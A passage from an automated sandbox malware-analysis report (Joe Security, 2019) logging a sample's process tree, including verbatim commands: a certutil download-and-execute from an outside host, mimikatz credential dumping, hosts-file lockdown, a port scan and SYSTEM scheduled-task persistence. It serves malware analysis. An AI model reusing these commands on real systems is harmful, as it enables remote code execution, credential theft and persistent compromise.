C:\Users\user\AppData\Local\Temp\509484\.... C:\Users\user\AppData\Local\Temp\509484\TemporaryFile success or wait 1 40494A MoveFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
File CreatedFile Created
File DeletedFile Deleted
File MovedFile Moved
File WrittenFile Written
Copyright Joe Security LLC 2019 Page 55 of 69
C:\Windows\cc3d3243\b158ac7.exe 0 524288 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3a b7 33 ae 7e d6 5d fd 7e d6 5d fd 7e d6 5d fd 05 ca 51 fd 7b d6 5d fd 11 c9 56 fd 77 d6 5d fd 11 c9 57 fd 78 d6 5d fd fd ca 53 fd 52 d6 5d fd 28 c9 4e fd 52 d6 5d fd fd de 00 fd 7c d6 5d fd 7e d6 5c fd d1 d4 5d fd 1c c9 4e fd 63 d6 5d fd 48 f0 57 fd b3 d6 5d fd 48 f0 56 fd 1e d6 5d fd 96 c9 56 fd 1a d6 5d fd 96 c9 57 fd 65 d6 5d fd 7e d6 5d fd 2a d6 5d fd b9 d0 5b fd 7f d6 5d
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.3.~.].~.].~.]...Q.{.]...V.w.]...W.x.]...S.R.].(.N.R.].....|.].~.\...]...N.c.].H.W...].H.V...]...V...]...W.e.].~.].*.]...[...]
success or wait 9 42A083 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
File Path Offset Length Completion CountSourceAddress Symbol
File ActivitiesFile Activities
Start time: 17:15:41
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c ping 127.0.0.1 -n 8 & Start C:\Windows\cc3d3243\b158ac7.exe
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
File Path Access Attributes Options Completion CountSourceAddress Symbol
Start time: 17:15:41
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/sqlisrv.exe %SystemRoot%\Temp\sqlisrv.exe & %SystemRoot%\Temp\sqlisrv.exe
Analysis Process: cmd.exe PID: 1896 Parent PID: 4748Analysis Process: cmd.exe PID: 1896 Parent PID: 4748
General
Analysis Process: cmd.exe PID: 4080 Parent PID: 3076Analysis Process: cmd.exe PID: 4080 Parent PID: 3076
General
Copyright Joe Security LLC 2019 Page 56 of 69
File ActivitiesFile Activities
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
File Path Access Attributes Options Completion CountSourceAddress Symbol
Start time: 17:15:41
Start date: 16/05/2019
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0x4
Imagebase: 0x7ff601f50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Start time: 17:15:42
Start date: 16/05/2019
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0x4
Imagebase: 0x7ff601f50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Start time: 17:15:42
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit): true
Commandline: ping 127.0.0.1 -n 8
Imagebase: 0x2d0000
File size: 18944 bytes
MD5 hash: 70C24A306F768936563ABDADB9CA9108
Has administrator privileges: true
Programmed in: C, C++ or other language
Analysis Process: conhost.exe PID: 2560 Parent PID: 1896Analysis Process: conhost.exe PID: 2560 Parent PID: 1896
General
Analysis Process: conhost.exe PID: 4960 Parent PID: 4080Analysis Process: conhost.exe PID: 4960 Parent PID: 4080
General
Analysis Process: PING.EXE PID: 2864 Parent PID: 1896Analysis Process: PING.EXE PID: 2864 Parent PID: 1896
General
Copyright Joe Security LLC 2019 Page 57 of 69
File ActivitiesFile Activities
Reputation: moderate
File Path Access Attributes Options Completion CountSourceAddress Symbol
File ActivitiesFile Activities
Start time: 17:15:42
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\certutil.exe
Wow64 process (32bit): true
Commandline: certutil.exe -urlcache -split -f http://fid.hognoob.se/sqlisrv.exe C:\Windows\Temp\sqlisrv.exe
Imagebase: 0x10a0000
File size: 1273856 bytes
MD5 hash: D056DF596F6E02A36841E69872AEF7BD
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
File Path Access Attributes Options Completion CountSourceAddress Symbol
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\sqlisrv[1].exe
unknown 3325 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 2e 39 34 00 55 50 58 21 0d 09 08 09 d0 c5 8e 26 e5 7a 9a a9 5a dd 5f 00 ee 3f 47 00 00 50 5c 00 26 1e 00 39 fe db
..............................
..............................
..............................
..............................
..............................
..............................
..............................
......3.94.UPX!.......&.z..Z._
..?G..P\.&..9..
success or wait 1 10E751E InternetReadFile
Analysis Process: certutil.exe PID: 3304 Parent PID: 4080Analysis Process: certutil.exe PID: 3304 Parent PID: 4080
General
File WrittenFile Written
Copyright Joe Security LLC 2019 Page 58 of 69
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\sqlisrv[1].exe
unknown 4096 41 51 0e 5a 01 ff 53 89 0b 50 3b c8 0f 8f a4 8d 63 b5 7e 00 d5 51 1a 48 79 50 04 bc a4 f2 04 59 5b 67 79 e3 09 84 09 e4 8a 03 cb 07 ff 90 1d ec db 04 69 dc 35 5a 59 37 9a ca b7 d4 16 d4 dc 05 8c 70 cc cc 83 1a e8 82 36 ec d9 68 3e 78 ab 5d bd 1c 30 40 27 f7 43 4c 24 21 84 7c 6a 2b 86 62 82 e0 97 d4 89 55 d8 25 e8 8a 05 87 9b 8d 85 e6 6e 35 a0 69 53 9c 92 f0 dc 25 11 d0 78 d0 91 b0 80 60 7b 12 82 e4 51 7b cc c6 03 20 bb 8c 70 2c 40 8e e1 fc a1 ec 51 b0 79 24 ec 8a 03 88 03 2d 01 19 88 60 15 d4 54 9a 0b 90 e8 d0 d0 d4 72 c0 f0 c8 ee 2d 58 4d 52 01 25 13 04 52 07 9c e8 f5 58 5b 59 43 99 40 19 25 87 02 0c f4 57 20 9f f9 25 b8 81 b7 51 90 96 62 15 13 01 87 d1 15 18 d0 2d cd 51 c1 a3 42 f2 89 b0 14 71 19 49 0e 72 32 00 9b 62 1d c1 88 61 5b fc 77 56 c0 12 83 f0
AQ.Z..S..P;.....c.~..Q.HyP.....Y[gy...............i.5ZY7.........p......6..h>x.]..0@'.CL$!.|j+.b.....U.%........n5.iS....%..x....`{...Q{... ..p,@.....Q.y$.....-...`..T.......r....-XMR.%..R....X[YC.@.%....W ..%...Q..b........-.Q..B....q.I.r2..b...a[.wV....
success or wait 1137 10E756C InternetReadFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
File Path Offset Length Completion CountSourceAddress Symbol
Start time: 17:15:49
Start date: 16/05/2019
Path: C:\Windows\cc3d3243\b158ac7.exe
Wow64 process (32bit): true
Commandline: C:\Windows\cc3d3243\b158ac7.exe
Imagebase: 0x400000
File size: 4672000 bytes
MD5 hash: 1328C9CC50BD324399B4A83CA043BE6E
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches: Rule: mimikatz, Description: mimikatz, Source: 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, Author: @fusionraceRule: mimikatz, Description: mimikatz, Source: 0000000B.00000002.5202663261.0000000000401000.00000040.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 0000000B.00000002.5202663261.0000000000401000.00000040.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 0000000B.00000002.5202663261.0000000000401000.00000040.sdmp, Author: @fusionrace
Analysis Process: b158ac7.exe PID: 5060 Parent PID: 1896Analysis Process: b158ac7.exe PID: 5060 Parent PID: 1896
General
Copyright Joe Security LLC 2019 Page 59 of 69
Antivirus matches: Detection: 100%, AviraDetection: 100%, Joe Sandbox MLDetection: 74%, virustotal, Browse
Reputation: low
File ActivitiesFile Activities
Start time: 17:15:50
Start date: 16/05/2019
Path: C:\Windows\cc3d3243\b158ac7.exe
Wow64 process (32bit): true
Commandline: C:\Windows\cc3d3243\b158ac7.exe
Imagebase: 0x400000
File size: 4672000 bytes
MD5 hash: 1328C9CC50BD324399B4A83CA043BE6E
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches: Rule: mimikatz, Description: mimikatz, Source: 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, Author: @fusionrace
Reputation: low
File Path Access Attributes Options Completion CountSourceAddress Symbol
C:\Windows\5c2a55da8\ read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 42A03F CreateDirectoryA
C:\Windows\5c2a55da8\Coolmaster\ read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 42A03F CreateDirectoryA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Analysis Process: b158ac7.exe PID: 3356 Parent PID: 564Analysis Process: b158ac7.exe PID: 3356 Parent PID: 564
General
File CreatedFile Created
File WrittenFile Written
Copyright Joe Security LLC 2019 Page 60 of 69
C:\Windows\System32\drivers\etc\hosts unknown 822 23 20 63 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 33 2d 32 30 30 39 20 6d 69 63 72 6f 73 6f 66 74 20 63 6f 72 70 2e 0d 0a 23 0d 0a 23 20 74 68 69 73 20 69 73 20 61 20 73 61 6d 70 6c 65 20 68 6f 73 74 73 20 66 69 6c 65 20 75 73 65 64 20 62 79 20 6d 69 63 72 6f 73 6f 66 74 20 74 63 70 2f 69 70 20 66 6f 72 20 77 69 6e 64 6f 77 73 2e 0d 0a 23 0d 0a 23 20 74 68 69 73 20 66 69 6c 65 20 63 6f 6e 74 61 69 6e 73 20 74 68 65 20 6d 61 70 70 69 6e 67 73 20 6f 66 20 69 70 20 61 64 64 72 65 73 73 65 73 20 74 6f 20 68 6f 73 74 20 6e 61 6d 65 73 2e 20 65 61 63 68 0d 0a 23 20 65 6e 74 72 79 20 73 68 6f 75 6c 64 20 62 65 20 6b 65 70 74 20 6f 6e 20 61 6e 20 69 6e 64 69 76 69 64 75 61 6c 20 6c 69 6e 65 2e 20 74 68 65 20 69 70 20 61 64 64 72 65 73 73 20 73 68 6f 75 6c
# copyright (c) 1993-2009 microsoft corp...#..# this is a sample hosts file used by microsoft tcp/ip for windows...#..# this file contains the mappings of ip addresses to host names. each..# entry should be kept on an individual line. the ip address shoul
success or wait 1 4A4C98 WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
File Path Offset Length Completion CountSourceAddress Symbol
C:\Windows\System32\drivers\etc\hosts unknown 824 success or wait 1 4A4C5F ReadFile
File ActivitiesFile Activities
Start time: 17:15:52
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
File Path Access Attributes Options Completion CountSourceAddress Symbol
File ReadFile Read
Analysis Process: cmd.exe PID: 3968 Parent PID: 3356Analysis Process: cmd.exe PID: 3968 Parent PID: 3356
General
Analysis Process: conhost.exe PID: 3384 Parent PID: 3968Analysis Process: conhost.exe PID: 3384 Parent PID: 3968
General
Copyright Joe Security LLC 2019 Page 61 of 69
Start time: 17:15:52
Start date: 16/05/2019
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0x4
Imagebase: 0x7ff601f50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
File ActivitiesFile Activities
Start time: 17:15:52
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /S /D /c' echo Y'
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
File Path Access Attributes Options Completion CountSourceAddress Symbol
File ActivitiesFile Activities
Start time: 17:15:52
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit): true
Commandline: cacls C:\Windows\system32\drivers\etc\hosts /T /D users
Imagebase: 0x1360000
File size: 27648 bytes
MD5 hash: 4CBB1C027DF71C53A8EE4C855FD35B25
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
File Path Access Attributes Options Completion CountSourceAddress Symbol
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
\Device\ConDrv unknown 1 41 A success or wait 19 13649CC fprintf
\Device\ConDrv unknown 1 70 p success or wait 16 13649CC fprintf
Analysis Process: cmd.exe PID: 1576 Parent PID: 3968Analysis Process: cmd.exe PID: 1576 Parent PID: 3968
General
Analysis Process: cacls.exe PID: 4728 Parent PID: 3968Analysis Process: cacls.exe PID: 4728 Parent PID: 3968
General
File WrittenFile Written
Copyright Joe Security LLC 2019 Page 62 of 69
File Path Offset Length Completion CountSourceAddress Symbol
File ActivitiesFile Activities
Registry ActivitiesRegistry Activities
Start time: 17:15:53
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit): true
Commandline: netsh ipsec static add policy name=Bastards description=FuckingBastards
Imagebase: 0xb70000
File size: 82944 bytes
MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807
Has administrator privileges: true
Programmed in: C, C++ or other language
File Path Access Attributes Options Completion CountSourceAddress Symbol
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
\Device\ConDrv unknown 2 0d 0a .. success or wait 1 B77B1B WriteFile
Key Path Completion CountSourceAddress Symbol
Key Path Name Type Data Completion CountSourceAddress Symbol
Start time: 17:15:53
Start date: 16/05/2019
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0x4
Imagebase: 0x7ff601f50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:15:54
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit): true
Analysis Process: netsh.exe PID: 4864 Parent PID: 3356Analysis Process: netsh.exe PID: 4864 Parent PID: 3356
General
File WrittenFile Written
Analysis Process: conhost.exe PID: 3340 Parent PID: 4864Analysis Process: conhost.exe PID: 3340 Parent PID: 4864
General
Analysis Process: netsh.exe PID: 1784 Parent PID: 3356Analysis Process: netsh.exe PID: 1784 Parent PID: 3356
General
Copyright Joe Security LLC 2019 Page 63 of 69
File ActivitiesFile Activities
Registry ActivitiesRegistry Activities
Commandline: netsh ipsec static add filteraction name=BastardsList action=block
Imagebase: 0xb70000
File size: 82944 bytes
MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807
Has administrator privileges: true
Programmed in: C, C++ or other language
File Path Access Attributes Options Completion CountSourceAddress Symbol
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
\Device\ConDrv unknown 2 0d 0a .. success or wait 1 B77B1B WriteFile
Key Path Completion CountSourceAddress Symbol
Key Path Name Type Data Completion CountSourceAddress Symbol
Start time: 17:15:54
Start date: 16/05/2019
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0x4
Imagebase: 0x7ff601f50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:15:57
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /S /D /c' echo Y'
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
File WrittenFile Written
Analysis Process: conhost.exe PID: 752 Parent PID: 1784Analysis Process: conhost.exe PID: 752 Parent PID: 1784
General
Analysis Process: cmd.exe PID: 2944 Parent PID: 3968Analysis Process: cmd.exe PID: 2944 Parent PID: 3968
General
Analysis Process: cacls.exe PID: 3632 Parent PID: 3968Analysis Process: cacls.exe PID: 3632 Parent PID: 3968
Copyright Joe Security LLC 2019 Page 64 of 69
Start time: 17:15:57
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit): true
Commandline: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
Imagebase: 0x1360000
File size: 27648 bytes
MD5 hash: 4CBB1C027DF71C53A8EE4C855FD35B25
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:16:03
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /S /D /c' echo Y'
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:16:03
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit): true
Commandline: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
Imagebase: 0x1360000
File size: 27648 bytes
MD5 hash: 4CBB1C027DF71C53A8EE4C855FD35B25
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:16:27
Start date: 16/05/2019
Path: C:\Windows\Temp\sqlisrv.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Temp\sqlisrv.exe
Imagebase: 0x400000
File size: 4672000 bytes
MD5 hash: 1328C9CC50BD324399B4A83CA043BE6E
Has administrator privileges: true
Programmed in: C, C++ or other language
General
Analysis Process: cmd.exe PID: 4316 Parent PID: 3968Analysis Process: cmd.exe PID: 4316 Parent PID: 3968
General
Analysis Process: cacls.exe PID: 1252 Parent PID: 3968Analysis Process: cacls.exe PID: 1252 Parent PID: 3968
General
Analysis Process: sqlisrv.exe PID: 652 Parent PID: 4080Analysis Process: sqlisrv.exe PID: 652 Parent PID: 4080
General
Copyright Joe Security LLC 2019 Page 65 of 69
Yara matches: Rule: mimikatz, Description: mimikatz, Source: 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp, Author: @fusionraceRule: mimikatz, Description: mimikatz, Source: 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp, Author: @fusionrace
Antivirus matches: Detection: 100%, AviraDetection: 100%, Joe Sandbox MLDetection: 74%, virustotal, Browse
Start time: 17:17:14
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c C:\Windows\5c2a55da8\Coolmaster\GogoleUpadte.exe TCP 192.168.0.1 192.168.0.255 6666 32
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:17:14
Start date: 16/05/2019
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0x4
Imagebase: 0x7ff601f50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:17:14
Start date: 16/05/2019
Path: C:\Windows\5c2a55da8\Coolmaster\GogoleUpadte.exe
Wow64 process (32bit): true
Analysis Process: cmd.exe PID: 4068 Parent PID: 3356Analysis Process: cmd.exe PID: 4068 Parent PID: 3356
General
Analysis Process: conhost.exe PID: 2924 Parent PID: 4068Analysis Process: conhost.exe PID: 2924 Parent PID: 4068
General
Analysis Process: GogoleUpadte.exe PID: 284 Parent PID: 4068Analysis Process: GogoleUpadte.exe PID: 284 Parent PID: 4068
General
Copyright Joe Security LLC 2019 Page 66 of 69
Commandline: C:\Windows\5c2a55da8\Coolmaster\GogoleUpadte.exe TCP 192.168.0.1 192.168.0.255 6666 32
Imagebase: 0xf90000
File size: 64512 bytes
MD5 hash: 821EA58E3E9B6539FF0AFFD40E59F962
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:17:26
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c C:\Windows\5c2a55da8\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\5c2a55da8\Corporate\log.txt
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:17:26
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c cd C:\Windows\5c2a55da8\usbprohub\ & C:\Windows\5c2a55da8\usbprohub\\ouousbpro.exe
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:17:26
Start date: 16/05/2019
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0x4
Imagebase: 0x7ff601f50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: true
Programmed in: C, C++ or other language
Analysis Process: cmd.exe PID: 1252 Parent PID: 3356Analysis Process: cmd.exe PID: 1252 Parent PID: 3356
General
Analysis Process: cmd.exe PID: 1524 Parent PID: 3356Analysis Process: cmd.exe PID: 1524 Parent PID: 3356
General
Analysis Process: conhost.exe PID: 3968 Parent PID: 1252Analysis Process: conhost.exe PID: 3968 Parent PID: 1252
General
Analysis Process: conhost.exe PID: 1068 Parent PID: 1524Analysis Process: conhost.exe PID: 1068 Parent PID: 1524
Copyright Joe Security LLC 2019 Page 67 of 69
Start time: 17:17:26
Start date: 16/05/2019
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0x4
Imagebase: 0x7ff601f50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:17:26
Start date: 16/05/2019
Path: C:\Windows\5c2a55da8\Corporate\vfshost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\5c2a55da8\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
Imagebase: 0x7ff607270000
File size: 390304 bytes
MD5 hash: FD5EFCCDE59E94EEC8BB2735AA577B2B
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches: Rule: mimikatz, Description: mimikatz, Source: 00000024.00000002.6192286869.00007FF607342000.00000040.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: Powerkatz_DLL_Generic, Description: Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible), Source: 00000024.00000002.6190697970.00007FF607271000.00000040.sdmp, Author: Florian RothRule: mimikatz, Description: mimikatz, Source: 00000024.00000001.6149235365.00007FF607342000.00000080.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: Powerkatz_DLL_Generic, Description: Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible), Source: 00000024.00000001.6146216390.00007FF607301000.00000080.sdmp, Author: Florian Roth
Start time: 17:17:26
Start date: 16/05/2019
Path: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
Wow64 process (32bit): true
Commandline: C:\Windows\5c2a55da8\usbprohub\\ouousbpro.exe
Imagebase: 0x3c0000
File size: 258046 bytes
MD5 hash: C02C8BE9AFC220F8B7852C619AF784C6
Has administrator privileges: true
Programmed in: C, C++ or other language
General
Analysis Process: vfshost.exe PID: 4240 Parent PID: 1252Analysis Process: vfshost.exe PID: 4240 Parent PID: 1252
General
Analysis Process: ouousbpro.exe PID: 2940 Parent PID: 1524Analysis Process: ouousbpro.exe PID: 2940 Parent PID: 1524
General
Analysis Process: cmd.exe PID: 1644 Parent PID: 3356Analysis Process: cmd.exe PID: 1644 Parent PID: 3356
Copyright Joe Security LLC 2019 Page 68 of 69
Disassembly
Code Analysis
Start time: 17:17:37
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn '93293e638' /ru system /tr 'cmd /c C:\Windows\ime\b158ac7.exe'
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:17:37
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn 'd95544aa8' /ru system /tr 'cmd /c echo Y|cacls C:\Windows\cc3d3243\b158ac7.exe /p everyone:F'
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:17:37
Start date: 16/05/2019
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0x4
Imagebase: 0x7ff601f50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: true
Programmed in: C, C++ or other language
General
Analysis Process: cmd.exe PID: 4448 Parent PID: 3356Analysis Process: cmd.exe PID: 4448 Parent PID: 3356
General
Analysis Process: conhost.exe PID: 4244 Parent PID: 1644Analysis Process: conhost.exe PID: 4244 Parent PID: 1644
General
Copyright Joe Security LLC 2019 Page 69 of 69